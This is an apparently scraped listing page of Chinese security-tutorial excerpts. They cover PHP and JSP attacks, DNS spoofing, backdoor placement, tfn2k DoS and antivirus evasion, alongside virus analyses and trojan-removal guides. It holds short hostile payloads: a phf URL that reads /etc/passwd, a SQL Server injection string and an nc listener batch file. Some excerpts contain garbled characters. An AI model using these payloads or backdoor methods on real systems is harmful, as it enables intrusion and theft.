网络安全 - 电脑教程网
如何对PHP程序中的常见漏洞进行攻击(下) 三
[如何增强PHP的安全性] 我在上面介绍的所有攻击对于缺省安装的PHP 4都可以很好的实现,但是我已经重复了很多次,PHP的配置非常灵活,通过配置一些PHP选项,我们完全可能抵抗其中的一些攻击。下面我按照实现的难度对一些配置进行了分类: *低难度 **中低难度 ***中高难度 ****高难度 上面的分类只是个人的看法,但是我可以保
分类:网络安全
攻击.jsp
今天我所要讨论的问题是通过提交特殊的URL直接攻击.jsp页面,达到该页面无法正常显示的效果!当然要让它显示出:hacked by xxx不是我讨论的范围! 一、jsp的生命流程: 因为了解了.jsp的生命流程之后,我觉得它存在某些设计上的缺陷!下边先来简单的解释一下.jsp文件的生命流程吧!.jsp文件有它特殊的书写规范: 这些是它特殊的书写
分类:网络安全
解密教程(四)
补丁制作 1、文件补丁制作 今天我们接触补丁制作工具是CodeFusion,界面制作也不错,它有以下功能: 1、可以自动比较补丁前后的差别2、可以对字节逐个补丁,也可以使用普通和模板两种查找、替换;3、补丁前后的文件尺寸可以不同;4、可以对单个文件补丁,也可以处理多个不同盘、不同目录、甚至名字并不匹配的多个文件;5、
分类:网络安全
如何对PHP程序中的常见漏洞进行攻击(下) 一
原著:Shaun Clowes http://www.securereality.com.au/ 翻译:analysist http://www.nsfocus.com/ [库文件] 正如我们前面讨论的那样,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代 码库包含到
分类:网络安全
如何对PHP程序中的常见漏洞进行攻击(上) 二
[远程文件] PHP是一种具有丰富特性的语言,提供了大量的函数,使编程者实现某个功能很容易。但是从安全的角度来看,功能越多,要保证它的安全性就越难,远程文件就是说明这个问题的一个很好的例子: ?php if (!($fd = fopen("$filename", "r")) echo("Could not open file: $filenameBR\n");? 上面的脚本试图打开文件“$fil
分类:网络安全
解决读取IIS服务器绝对路径错误的方法
by:superhei 一段时间再看了臭要饭的《划时代脚本攻击》后感觉大受启发,从此对存储扩展产生了浓厚的兴趣。但是其中读取服务器web绝对路径一点我始终测试没有成功,只有在默认安装的时候才会正确读� R簿褪撬底⒉岜砝锩娲娲⒌闹皇窃诎沧癐IS时的web绝对路径,而如果用户对这个路径进行修改的话,注册表内的值仍然是不变的。
分类:网络安全
破解学习:深思Ⅲ加密狗
sworm目标: XX CAD设计软件。加密形式: 深思Ⅲ加密狗。破解工具:Winice, Hiew, Wdasm893中文版。【破解过程】㈠运行程序,显示“Internal Error. 软件出现致命错误,请检查加密狗是否正确!”后退出。㈡在Wice中Bpx Messageboxa,再运行程序,显示上述信息时弹出。按F12若干次回到调用处,可见是xxxxxrx调用ACAD.acrx_abor
分类:网络安全
如何对PHP程序中的常见漏洞进行攻击(上) 一
编者按: 这是一篇几年前的老文章了,不过对初学者而言,文章仍有很好的指导作用。 原著: Shaun Clowes http://www.securereality.com.au/ 翻译: analysist http://www.nsfocus.com/ 之所以翻译这篇文章,是因为目前关于CGI安全性的文章都是拿Perl作为例子,而专门介绍ASP,PHP或者jsp安全性的文章则很少。Shaun Clowes的
分类:网络安全
简要介绍七种 DoS 攻击的方法
Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。 Smurf:该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求
分类:网络安全
一个找肉鸡的简单方法
首先,你需要一个小东西,nc.exe。 接着编辑一个bat批处理文件。 ----------cut here---------------------@echo off:startnc -vv -w 5 -l -p 80httpd.loggoto start----------cut here--------------------- 运行批处理程序之后,你就等着肉鸡上门来找你吧! (注:多为2000,中毒的主机,注意区分地区
分类:网络安全
Windows下DNS ID欺骗的原理与实现 一
本文相关程序 T-DNS 支持对局域网内任意主机发起DNS ID欺骗攻击,使其所访问的任何网站均被指向一个您自定义的WEB服务器,如您自己的个人主页。域名系统(DNS)是一种用于TCP/IP应用程序的分布式数据库,它提供主机名字和IP地址之间的转换信息。通常,网络用户通过UDP协议和DNS服务器进行通信,而服务器在特定的53端口监听
分类:网络安全
Win2k入侵后后门的放置
在阅读本文之前,假设你已经成功入侵了某台Win2k主机并取得 了管理员帐号。大多数时候我们入侵某台主机的目的并不是为了直接破坏,可以在该主机上留下后门以便自己以后可以方便的“使用”该机。目前一般情况下,入侵Win2k后使用最多的后门是RemoteNc了,但该工具有一很大的缺点,容易被杀毒软件查出,而且如果用fport或 Act
分类:网络安全
浏览器攻击
在本章我将讲述一些利用浏览器来进行攻击的方法1。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那个站点的passwd.但还有些更好的执行方法呦如:http://thegnome.com/cgi-bin/phf?%0aidQname=haqrQnickna me=Qali
分类:网络安全
叛逃者病毒分析
2003年2月,国内发现一个混合型脚本病毒“叛逃者”(VBS.Evade)病毒。该病毒不但感染脚本文件、Excel和Word文档,而且还会直接覆盖一部分音乐、视频及工作文档。与此同时,他还会通过email到处发放已被感染Office文档,造成用户重要信息泄露。因此,该病毒危害性极大。下面就该病毒的工作原理和解决办法具体分析介绍一下:
分类:网络安全
如何创建后门
参考文献:Article: backdoor from The Infinity Concept Issue IISrc: b4b0.c by b4b0Src: daemonsh.pl by van Hauser / [THC] in 1997' 千辛万苦(or 轻而易举)的取得root后,当然希望长久的保持. 以被以后用来。。。d0ing what u want t0 d0 :) 传统的方法就是建立一个后门(backd00r).即使入侵被发现,好的(先进)后门
分类:网络安全
空连接得到一些什么有用的信息(win NT系列)
下面是对一个没禁止空连接的系统的信息的分析D:\>info 211.104.116.186Remote System Info Retriever By Meteor(Slackbot)Pinging 211.104.116.186 [211.104.116.186] with 32 bytes of data:Reply from: 211.104.116.186: bytes=32 time=721ms TTL=109Reply from: 211.104.116.186: bytes=32 time=711ms TTL=109Reply from
分类:网络安全
手工轻松清除隐藏在电脑里的病毒和木马
现在上网的朋友越来越多了,其中有一点不可避免的就是如何防范和查杀病毒和恶意攻击程序了。但是,如果不小心中了病毒而身边又没有杀毒软件怎么办?没有关系,今天我就来教大家怎样轻松地手工清除藏在电脑里的病毒和木马。检查注册表注册表一直都是很多木马和病毒“青睐”的寄生场所,注意在检查注册表之前要先给注册表备份
分类:网络安全
Frontpage扩展攻击
在流光扫描结果中有一项frontpage扩展攻击~下边来把以前的帖子重贴一下希望有过攻击经验的来跟帖子~谢谢~因为他毕竟是一项新功能Microsoft? FrontPage? 2000 服务器扩展是一组在站点服务器的程序,它可以支持管理、创作和浏览一个用 FrontPage 扩展的站点。FrontPage 服务器扩展使用公共网关接口 (CGI) 或 Internet 服务器
分类:网络安全
木马的通用解法
由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手
分类:网络安全
浅谈139/445与入侵2K主机
SMB(ServerMessageBlock),Windows协议族,用于文件和打印共享服务。在Win9X/NT中SMB基于NBT实现,NBT(NetBIOSoverTCP/IP)使用137,138(UDP)and139(TCP)来实现基于TCP/IP的NETBIOS网际互联;而在Win2K以后,SMB除了基于NBT的实现,还可以直接运行在TCP/IP上,而没有额外的NBT层,使用TCP445端口。当Win9X/NT(允许NBT)作为c
分类:网络安全
网络神偷特征码修改实战
网络神偷特征码修改实战文章作者:icyfoxlovelace/冰狐浪子[EST]注意:本文首发于《黑客防线》 网络神偷不愧是一个专业级的远程文件访问工具,其操作简单,功能“专而精”,但诚如作者所言“一直以来,我们都秉承着免费的精神,为大家提供各种软件,但唯一不足的是目前很多杀毒软件都对网络神偷进行追杀,被冠以病毒之名�
分类:网络安全
如何在命令行下更改ip地址
微软的Windows家族从Windows NT开始跨入了网络操作系统的市场,到现在的windows 2000可以说网络功能在逐渐的完善,在这个成长过程中Windows融入了很多其他网络操作系统的功能,可以说是借鉴而来的,逐渐形成了一套功能完善的网络操作系统,这也是令SUN等各大公司所感觉到不服的原因,觉得不是微软完全自给研发的东西。不过W
分类:网络安全
对Mydoom.a的shimgapi.dll的分析 一
Mydoom.a的后门是以dll形式存在的,通过修改注册表相应键值,将自己加载到资源管理器的进程空间中.正常情况下,注册表应该是这个样子的:HKEY_CLASSES_ROOTCLSID{E6FB5E20-DE35-11CF-9C87-00AA005127ED}InProcServer32NO NAME REG_EXPAND_SZ %SystemRoot%System32webcheck.dllThreadingModel REG_SZ Apartment 而Mydoom.a将
分类:网络安全
SQLSERVER注入必殺技
必殺技成功條件:1.找到注入點2.數據庫為SQLSERVER3.IIS沒屏蔽錯誤提示 注:因必殺技是我研究N久的心得,經多次改良,成功率極高。請不要用於不合法用途上,否則後果自負。 [N] = 第N個表ID=1 and (Select top 1 name from(Select top [N] id,name from sysobjects where xtype=char(85)) T order by id desc)1 [T] = 表名[
分类:网络安全
tfn2k使用方法和对策(1)
这里主要介绍tfn2k,因为它最著名嘛!主要分为使用说明,攻击实例,程序分析,防范手段等几部分。简介: TFN被认为是当今功能最强性能最好的DoS攻击工具,几乎不可能被察觉。作者发布这个工具的出发点是什么呢?作者向你保证它不会伤害公司或个人。但是它会吓一吓那些不关心系统安全的人,因为现在精密的工具被不断改善,并
分类:网络安全
常见命令和端口列表 二
端口:1524 服务:ingress 说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。端口:160
分类:网络安全
UNIX入侵(一)
一、入侵UNIX系统前一些必备的基础知识: 1.UNIX的一些基础知识: 1#UNIX系统具有如下特点: 分级树形文件结构、文件、目录表和外部设备作为文件统一管理、提供功能完备的命令程序语言"Shell语言"、提供了各种程序设计语言和大量的程序设计子系统、系统核心和外部程序大部分采用C语言编写、采用进程映像对换技术、系统
分类:网络安全
UNIX入侵(二)
1.UNIX Shell: 命令解释程序Shell处在内核(Kernel)与外层软件之间,具有非常重要的地位及作用,Shell的作用是逐条的解释用户输入的命令,并给出回答及提示,它用于协调用户及系统的一致性,在用户及系统中进行交互。 当用户进入系统,就开始和Shell命令解释程序的主控程序进行通信,每引用一次解释程序就调用一个Shell
分类:网络安全
fport.vbs for XP/2003
zzzevazzz作者:zzzevazzz XP和2003下的netstat有-o选项,所以可以容易地实现fport。vbs脚本版:Codz: withnewregexp.pattern="(..Ps+S+s+S+s+[A-Z]*)s*([0-9]+)".global=truesetms=.execute(createobject("wscript.shell").exec("netstat -ano").stdout.readall)endwithforeachpsingetobject("winmgmts:\.\rootcimv2:win32_
分类:网络安全
ASP漏洞+SQL注入的入侵方法
本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下。首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息。再用nmap -sS IP -P0 -p 139 ,透过防火墙查看是否开有139端口。从上面得到的信息我们可以简单的判断到:主机A的系统是什么,装有防火墙的话,一般是只允许80端口开放的
分类:网络安全
<< 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 >>